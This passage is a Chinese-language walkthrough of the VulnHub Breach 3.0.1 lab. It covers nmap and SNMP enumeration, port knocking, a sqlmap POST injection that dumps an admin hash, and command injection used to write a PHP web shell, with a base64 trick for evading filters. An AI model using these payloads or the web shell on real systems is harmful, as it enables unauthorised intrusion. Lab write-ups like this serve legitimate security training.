题目地址：https://www.vulnhub.com/entry/breach-301,177/

下载好靶机文件之后需要先把文件后缀改为ova，把之前的“.”去掉，然后用Vmware打开此文件导入虚拟机，等待虚拟机导入完毕，将网络设置为NAT并设置DHCP服务器，使靶机能自动获取IP地址，然后开启虚拟机。

虚拟机打开之后会显示自动配置网络设置，靶机系统是Ubuntu14.04，靶机成功启动之后查看虚拟机网卡的网段，然后使用nmap进行这一网段的ping扫描来确定存活主机：

nmap -sn 192.168.229.0/24

扫描结果显示有两台存活主机，一台是我的kali虚拟机（192.168.229.128），另一台应该就是靶机了，靶机的IP地址为192.168.229.128

下一步是继续对靶机进行信息收集，还是用nmap扫一下开放的端口：

nmap -T4 -A -v 192.168.229.129

结果显示一个TCP端口都没有，奇了怪了，没入口怎么破，于是又扫了一下UDP端口的开放情况：

☁  ~  nmap -sS -sU -T4 -A -v 192.168.229.129
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-19 09:21 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:21
Completed NSE at 09:21, 0.00s elapsed
Initiating NSE at 09:21
Completed NSE at 09:21, 0.00s elapsed
Initiating ARP Ping Scan at 09:21
Scanning 192.168.229.129 [1 port]
Completed ARP Ping Scan at 09:21, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:21
Completed Parallel DNS resolution of 1 host. at 09:21, 0.01s elapsed
Initiating SYN Stealth Scan at 09:21
Scanning 192.168.229.129 [1000 ports]
Completed SYN Stealth Scan at 09:21, 21.53s elapsed (1000 total ports)
Initiating UDP Scan at 09:21
Scanning 192.168.229.129 [1000 ports]
Discovered open port 161/udp on 192.168.229.129
Completed UDP Scan at 09:22, 10.01s elapsed (1000 total ports)
Initiating Service scan at 09:22
Scanning 1000 services on 192.168.229.129
Service scan Timing: About 0.40% done
Service scan Timing: About 3.20% done; ETC: 11:03 (1:38:19 remaining)
Service scan Timing: About 6.20% done; ETC: 10:40 (1:13:53 remaining)
Service scan Timing: About 9.20% done; ETC: 10:32 (1:04:09 remaining)
Service scan Timing: About 12.20% done; ETC: 10:28 (0:58:32 remaining)
Service scan Timing: About 15.20% done; ETC: 10:26 (0:54:29 remaining)
Service scan Timing: About 18.20% done; ETC: 10:24 (0:51:10 remaining)
Service scan Timing: About 23.50% done; ETC: 10:17 (0:42:39 remaining)
Service scan Timing: About 24.20% done; ETC: 10:22 (0:45:50 remaining)
Service scan Timing: About 29.40% done; ETC: 10:17 (0:39:16 remaining)
Service scan Timing: About 35.40% done; ETC: 10:17 (0:35:46 remaining)
Service scan Timing: About 41.40% done; ETC: 10:17 (0:32:21 remaining)
Service scan Timing: About 47.40% done; ETC: 10:17 (0:28:59 remaining)
Service scan Timing: About 53.40% done; ETC: 10:17 (0:25:38 remaining)
Service scan Timing: About 59.40% done; ETC: 10:16 (0:22:18 remaining)
Service scan Timing: About 65.40% done; ETC: 10:16 (0:18:59 remaining)
Service scan Timing: About 71.40% done; ETC: 10:16 (0:15:41 remaining)
Service scan Timing: About 77.40% done; ETC: 10:16 (0:12:23 remaining)
Service scan Timing: About 83.40% done; ETC: 10:16 (0:09:05 remaining)
Service scan Timing: About 88.90% done; ETC: 10:17 (0:06:06 remaining)
Service scan Timing: About 94.90% done; ETC: 10:17 (0:02:48 remaining)
Completed Service scan at 10:17, 3319.00s elapsed (1000 services on 1 host)
Initiating OS detection (try #1) against 192.168.229.129
Retrying OS detection (try #2) against 192.168.229.129
NSE: Script scanning 192.168.229.129.
Initiating NSE at 10:17
Completed NSE at 10:18, 45.22s elapsed
Initiating NSE at 10:18
Completed NSE at 10:19, 55.12s elapsed
Nmap scan report for 192.168.229.129
Host is up (0.0042s latency).
Not shown: 1000 filtered ports, 999 open|filtered ports
PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: ad610f2abb4d5b5800000000
|   snmpEngineBoots: 19
|_  snmpEngineTime: 1h08m06s
| snmp-sysdescr: Linux Initech-DMZ01 4.4.0-45-generic #66~14.04.1-Ubuntu SMP Wed Oct 19 15:05:38 UTC 2016 x86_64
|_  System uptime: 1h08m7.02s (408702 timeticks)
MAC Address: 00:0C:29:76:41:E4 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Service Info: Host: Initech-DMZ01

TRACEROUTE
HOP RTT     ADDRESS
1   4.20 ms 192.168.229.129

NSE: Script Post-scanning.
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3455.13 seconds
           Raw packets sent: 4049 (152.554KB) | Rcvd: 3 (308B)

发现只有161端口是开着的，运行了SNMP服务，做到这里想到获取此端口上暴漏的信息，于是百度有关snmp的命令，结果没什么收获，只是知道有GET方法，于是在kali中输入snmp+tab

☁  ~  snmp
snmp-bridge-mib  snmp-check       snmpget          snmpset          snmptrap       
snmpbulkget      snmpconf         snmpgetnext      snmpstatus       snmpusm        
snmpbulkwalk     snmpd            snmpinform       snmptable        snmpvacm       
snmpc            snmpdelta        snmpkey          snmptest         snmpwalk       
snmpcheck        snmpdf           snmpnetstat      snmptranslate

发现了与GET命令相关的命令snmpget于是尝试一波,发现如下信息：

☁  ~  snmpget 192.168.229.129      
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.229.129:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 192.168.229.129
  Hostname                      : Initech-DMZ01
  Description                   : Linux Initech-DMZ01 4.4.0-45-generic #66~14.04.1-Ubuntu SMP Wed Oct 19 15:05:38 UTC 2016 x86_64
  Contact                       : Email: Milton@breach.local - (545)-232-1876
  Location                      : Initech - is this thing on? I doubt anyone thinks to look here, anyways, I've left myself a way back in and burn the place down once again.
  Uptime snmp                   : 15:12:39.80
  Uptime system                 : 15:12:23.84
  System date                   : 2018-9-20 00:21:49.0

“这东西是开着的吗？我怀疑任何人都会想看看这里，不管怎样，我给自己留了一条路，再一次烧毁了这个地方。”，这里说出题人在这里留了后门，他离开的时候就会把后门给烧毁（破坏），其实这是个坑，因为只靠这一个端口很难继续进行下去，而且出题者说了留下了后门，那这里一定是有可以打开部分TCP端口的方法的，于是我找到了端口敲门服务https://www.cnblogs.com/wsjhk/p/5508051.html

apt-get install knockd

而上文中跟敲门序列最相近的就是email后面的数字了，因此：

knock 192.168.229.129 545 232 1876

命令执行无任何回显,此时在扫一下TCP端口发现多了很多

Scanning 192.168.229.129 [1000 ports]
Discovered open port 23/tcp on 192.168.229.129
Discovered open port 22/tcp on 192.168.229.129
Discovered open port 10010/tcp on 192.168.229.129
Discovered open port 5800/tcp on 192.168.229.129
Discovered open port 2048/tcp on 192.168.229.129
Discovered open port 10009/tcp on 192.168.229.129

看到telnet，先连一下试试：

☁  ~  telnet 192.168.229.129      
Trying 192.168.229.129...
Connected to 192.168.229.129.
Escape character is '^]'.
I used to have a backdoor here but they closed it down around when they moved my desk into the basement.
Connection closed by foreign host.

“以前这里有后门，但当他们把我的桌子搬到地下室时，他们把它关上了。”
没什么思路，继续练一下ssh试试

 ~  ssh root@192.168.229.129
**********************************************************************
*                                                                    * 
*          The Bobs Cloud Hosting, LLC. Secure Backdoor              *
*                                                                    * 
*                                                                    *
*  If you wish to discuss cloud hosting options, give us a call at   *
*                                                                    *
*   555-423-1800 or email us at thebobs@thebobscloudhostingllc.net   *
*                                                                    * 
**********************************************************************

root@192.168.229.129's password:

不知道密码，在这里卡了一段时间，最后突然发现这个knock序列跟刚才不一样，重新敲下门

knock 192.168.229.129 555 423 1800

重新看一下开放的端口发现多了个8的TCP端口，服务是apache-httpd于是尝试从浏览器访问，发现此网站需要身份认证，账户密码在同系列挑战中的前两个挑战中留下了账号密码的信息：milton|thelaststraw，用此账户名密码登陆后看到如下界面：

发现一个待办事项表，而且这个上面提到了“掠夺他们所有的数据库”，点击下方的链接就来到了一个貌似是网站后台的登陆界面：

结合前面的提示，这明显是一个注入页面，于是Sqlmap启动，这是一个POST注入，我截获的部分Http头内容如下：

Referer: http://192.168.229.129:8/breach3/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Cookie: PHPSESSID=nigh3kqnonu8co9frhn9fa6rh6
Authorization: Basic bWlsdG9uOnRoZWxhc3RzdHJhdw==
Connection: close
Upgrade-Insecure-Requests: 1

username=test&password=asdasdasd&submit=+Login+

所以命令为：

sqlmap -u "http://192.168.229.129:8/breach3/index.php" --dbms=mysql --auth-type=basic --auth-cred=milton:thelaststraw --level=3 --risk=3 --data="username=me&password=me&submit=+Login+" -p password  -D thebobs --dump

得到的结果是

Database: thebobs
Table: login
[1 entry]
+----+----------+------------------------------------------+
| id | username | password                                 |
+----+----------+------------------------------------------+
| 1  | admin    | 8f4fadb24304d60d9dcb1589aa6a5c2d2d373229 |
+----+----------+------------------------------------------+

利用此账号密码进行登陆

进入管理界面，并发现了更多的页面：

http://192.168.229.129:8/breach3/initechnetmonitor.php页面的内容：

这里显示了这台主机的网络信息，这里可以看到ICMP服务是关闭的，也就是直接去ping这台服务器是ping不同的，这里我就很好奇既然ping不通那么我第一步做主机ping扫描的时候nmap是怎么识别出这台主机的？

既然游客这么多的页面，而且貌似没有更深的目录了，因此AppScan启动，扫描结果为该网站存在命令执行漏洞，此处试了一下把一句话echo到txt中：

http://192.168.229.129:8/breach3/thebobscloudhostingllc/livechat.php?searcher=echo '<?php echo shell_exec($_GET['e']); ?>' >test.txt

此时发现test.txt中已经将一句话写入成功了

接下来怎么办呢，当然是写小马了，于是：

http://192.168.229.129:8/breach3/thebobscloudhostingllc/livechat.php?searcher=echo '<?php echo shell_exec($_GET['e']); ?>' >shell.php

此时试试我们的小马能不能用：

http://192.168.229.129:8/breach3/thebobscloudhostingllc/shell.php?e=ls

执行成功，完美，其实这里有个小技巧，因为直接以铭文的方式写shell的话如果有waf或者某些过滤语句可能会把语句中的部分符号或者命令给过滤掉，因此可以采用先baseEncode后baseDecode的方式写shell：

☁  ~  echo '<?php echo shell_exec($_GET['e']); ?>' | base64
PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUW2VdKTsgPz4K

http://192.168.229.129:8/breach3/thebobscloudhostingllc/livechat.php?searcher=echo PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUW2VdKTsgPz4K | base64 -d > shell.php

这种方式可以保证写的东西不被过滤掉。

做到这里就可以试试查看一下各种文件了，但是文件很多，一般来说出题人都会把重要的文件放在home、tmp等文件夹中，查看一下：